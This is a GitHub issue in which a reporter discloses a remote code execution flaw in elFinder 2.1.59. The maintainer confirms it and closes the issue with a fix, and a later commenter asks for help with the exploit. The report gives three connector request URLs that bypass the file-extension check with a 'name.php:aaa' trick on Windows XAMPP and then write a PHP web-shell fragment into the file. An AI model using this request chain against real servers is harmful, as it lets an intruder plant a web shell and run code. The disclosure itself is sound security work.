Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RCE elFinder 2.1.59 #3429

Closed
Ph33rr opened this issue Nov 1, 2021 · 5 comments
Closed

RCE elFinder 2.1.59 #3429

Ph33rr opened this issue Nov 1, 2021 · 5 comments

Comments

@Ph33rr
Copy link

Ph33rr commented Nov 1, 2021

Describe the bug

bypass ext check

Steps to reproduce the behavior:

  1. create a .php file using the following URL:
    http://127.0.0.1/elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa
    2.Hash file :
    http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=open&target=l1_
    3.Add PHP code in webshell.php
    http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=put&content=jpeg<?php echo $_GET["infosec_90"]&target=HashFile

p (please complete the following information):**

  • OS: Windows XAMPP
@nao-pon
Copy link
Member

nao-pon commented Nov 1, 2021

@Ph33rr

We cannot create such a file with the default configuration.

http://127.0.0.1/elFinder-2.1.59/php/connector.minimal.php?cmd=mkfile&name=webshell.php:aaa&target=l1_Lw

then got result was

{"error":["errMkfile","webshell.php:aaa"]}

on XAMPP for Windows 7.3.11

@Ph33rr
Copy link
Author

Ph33rr commented Nov 1, 2021

now open :
http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=open&target=l1_
you will see webshell.php file

@nao-pon
Copy link
Member

nao-pon commented Nov 1, 2021

ah I see. understood.

Hmmm, I know there are some madcap people who use XAMPP as a public server. I have to fix it. Hah.

@nao-pon nao-pon closed this as completed in c08bcbf Nov 1, 2021
@nao-pon
Copy link
Member

nao-pon commented Nov 1, 2021

@Ph33rr I am very grateful for your contribution! 👍

@aliraza7989
Copy link

Hello there
I need assistance in this exploit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants